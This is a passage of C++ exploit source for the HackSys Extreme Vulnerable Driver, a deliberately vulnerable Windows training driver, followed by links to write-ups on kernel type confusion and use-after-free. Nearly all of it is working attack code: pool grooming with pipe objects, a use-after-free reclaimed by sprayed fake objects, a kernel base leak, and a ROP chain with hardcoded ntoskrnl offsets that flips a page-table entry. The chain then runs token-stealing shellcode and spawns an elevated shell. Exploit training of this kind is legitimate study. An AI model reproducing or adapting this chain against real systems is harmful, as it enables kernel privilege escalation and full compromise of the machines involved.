    memset(buffer, 'A', sizeof(buffer));

    printf("[+] Phase I: Performing Defragmentation for the object....\n");
    for (int i = 0; i < HANDLE_COUNT; i++) {
        if (!CreatePipe(&rPipes[i], &wPipes[i], NULL, sizeof(buffer))) {
            printf("Error: CreatePipe failed at iteration %d\n", i);
            break;
        }
        if (!WriteFile(wPipes[i], buffer, sizeof(buffer), &outLength, NULL)) {
            printf("Error: WriteFile failed at iteration %d\n", i);
            break;
        }
    }

    printf("[+] Phase II: Allocating objects in sequence....\n");
    for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) {
        if (!CreatePipe(&srPipes[i], &swPipes[i], NULL, sizeof(buffer))) {
            printf("Error: CreatePipe failed at iteration %d\n", i);
            break;
        }
        if (!WriteFile(swPipes[i], buffer, sizeof(buffer), &outLength, NULL)) {
            printf("Error: WriteFile failed at iteration %d\n", i);
            break;
        }
    }

    printf("[+] Phase III: Creating holes in the pool...\n");
    for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) {
        if (i % 2 == 0) {
            CloseHandle(srPipes[i]);
            CloseHandle(swPipes[i]);
        }
    }

    //free(rPipes);
    //free(wPipes);
    //free(srPipes);
    //free(swPipes);
    return 0;
}

// Returns the base address of the first loaded driver image (ntoskrnl)
PVOID getbaseaddress() {
    BOOL status;
    LPVOID* pImageBase;
    DWORD ImageSize;
    status = EnumDeviceDrivers(nullptr, 0, &ImageSize);
    pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);
    LPVOID ntaddr = pImageBase[0];
    return ntaddr;
}

// Computes the PTE offset for an address, mirroring nt!MiGetPteAddress
uintptr_t MiGetPte(LPVOID lpMemory) {
    uintptr_t addr = reinterpret_cast<uintptr_t>(lpMemory);
    uintptr_t calc1 = addr >> 9; // shr rcx, 9
    uintptr_t calc2 = calc1 & 0x7FFFFFFFF8; // and rax, rcx
    return calc2;
}

int main() {
    BOOL success; // DeviceIoControl returns a BOOL, not an NTSTATUS

    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Failed to open handle: %lu", GetLastError());
        return 1;
    }

    printf("[+] Performing Pool grooming...\n");
    fengshui();

    printf("[+] Calling AllocateUaFObjectNonPagedPool....");
    success = DeviceIoControl(
        hDriver,
        ALLOCATE_UAF_NON_PAGED,
        nullptr,
        0,
        nullptr,
        0,
        nullptr,
        nullptr);
    if (success) {
        printf("success\n");
    }
    else {
        printf("failed: %lu\n", GetLastError());
    }

    printf("[+] Calling FreeUaFObjectNonPagedPool....");
    success = DeviceIoControl(
        hDriver,
        FREE_UAF_NON_PAGED,
        nullptr,
        0,
        nullptr,
        0,
        nullptr,
        nullptr);
    if (success) {
        printf("success\n");
    }
    else {
        printf("failed: %lu\n", GetLastError());
    }

    LPVOID nt_addr = getbaseaddress();
    printf("[+] Nt base address: %p\n", nt_addr);

    BYTE shellcode[256] = {
        0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
        0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00,
        0x49, 0x89, 0xc0,
        0x4d, 0x8b, 0x80, 0x48, 0x04, 0x00, 0x00,
        0x49, 0x81, 0xe8, 0x48, 0x04, 0x00, 0x00,
        0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
        0x49, 0x83, 0xf9, 0x04,
        0x75, 0xe5,
        0x49, 0x8b, 0x88, 0xb8, 0x04, 0x00, 0x00,
        0x80, 0xe1, 0xf0,
        0x48, 0x89, 0x88, 0xb8, 0x04, 0x00, 0x00,
        0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
        0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00,
        0x66, 0xff, 0xc1,
        0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00,
        0x48, 0x8b, 0x90, 0x90, 0x00, 0x00, 0x00,
        0x48, 0x8b, 0x8a, 0x68, 0x01, 0x00, 0x00,
        0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
        0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00,
        0x48, 0x8b, 0xaa, 0x58, 0x01, 0x00, 0x00,
        0x31, 0xc0,
        0x0f, 0x01, 0xf8,
        0x48, 0x0f, 0x07,
        // 0xff padding up to the end of the array
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
    };

    LPVOID lpMemory = VirtualAlloc(NULL, sizeof(shellcode), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);
    printf("[+] Shellcode address: %p\n", lpMemory);
    memcpy(lpMemory, shellcode, sizeof(shellcode));

    uintptr_t ShellcodePte = MiGetPte(lpMemory);
    printf("[+] PTE calculated shellcode address: %p\n", (void*)ShellcodePte);

    printf("[+] Calling AllocateFakeObjectNonPagedPool....\n");
    printf("[+] Filling the holes with fake objects..\n");
    CHAR buffer[0x58];
    // The first 8 bytes of the fake object are the pointer the driver will call
    *(LPVOID*)(buffer) = (LPVOID)((uintptr_t)nt_addr + 0x0059f24e); // mov esp, 0x83000000 ; ret
    memset(buffer + 0x8, 'B', 0x50);

    uintptr_t STACK_PIVOT = 0x83000000;
    LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    printf("[+] Allocated region: %p\n", fakeStack);
    if (!VirtualLock(fakeStack, 0x10000)) {
        printf("Error using VirtualLock: %lu\n", GetLastError());
    }
    // memset takes the fill value before the size
    memset((LPVOID)fakeStack, '\x41', 0x10000);

    int index = 0;
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00202e71); // pop rcx; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)ShellcodePte; // Shellcode in user-mode
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00201862); // pop rax; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); // nt!MiGetPteAddress+0x13
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0027bcbf); // mov rax, qword ptr [rax]; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0020e204); // add rax, rcx; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00201861); // pop r8 ; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)(0xfffffffffffffffc); // -4
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x003fd49b); // add qword ptr [rax], r8 ; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = lpMemory; // Shellcode in user-mode

    // Spray fake objects so that one of them reclaims the freed Hack block
    for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) {
        success = DeviceIoControl(
            hDriver,
            ALLOCATE_FAKE_NON_PAGED,
            buffer,
            sizeof(buffer),
            nullptr,
            0,
            nullptr,
            nullptr);
    }

    printf("[+] Calling UseUaFObjectNonPagedPool....");
    success = DeviceIoControl(
        hDriver,
        USE_UAF_NON_PAGED,
        nullptr,
        0,
        nullptr,
        0,
        nullptr,
        nullptr);
    if (success) {
        printf("success\n");
    }
    else {
        printf("failed: %lu\n", GetLastError());
    }

    printf("[+] Spawning a shell with elevated privileges\n\n");
    system("cmd");

    // close handle
    printf("[+] Closing handle\n");
    CloseHandle(hDriver);
    return 0;
}
References:
Type Confusion:
- https://wafzsucks.medium.com/how-a-simple-k-typeconfusion-took-me-3-months-long-to-create-a-exploit-f643c94d445f
- https://vuln.dev/windows-kernel-exploitation-hevd-x64-type-confusion/
- https://kristal-g.github.io/2021/02/20/HEVD_Type_Confusion_Windows_10_RS5_x64.html
Use-After-Free:
- https://www.exploit-db.com/docs/english/16032-kernel-pool-exploitation-on-windows-7.pdf
- https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf
- https://www.alex-ionescu.com/kernel-heap-spraying-like-its-2015-swimming-in-the-big-kids-pool/
- https://securityinsecurity.github.io/exploiting-hevd-use-after-free/
- https://vuln.dev/windows-kernel-exploitation-hevd-x64-use-after-free/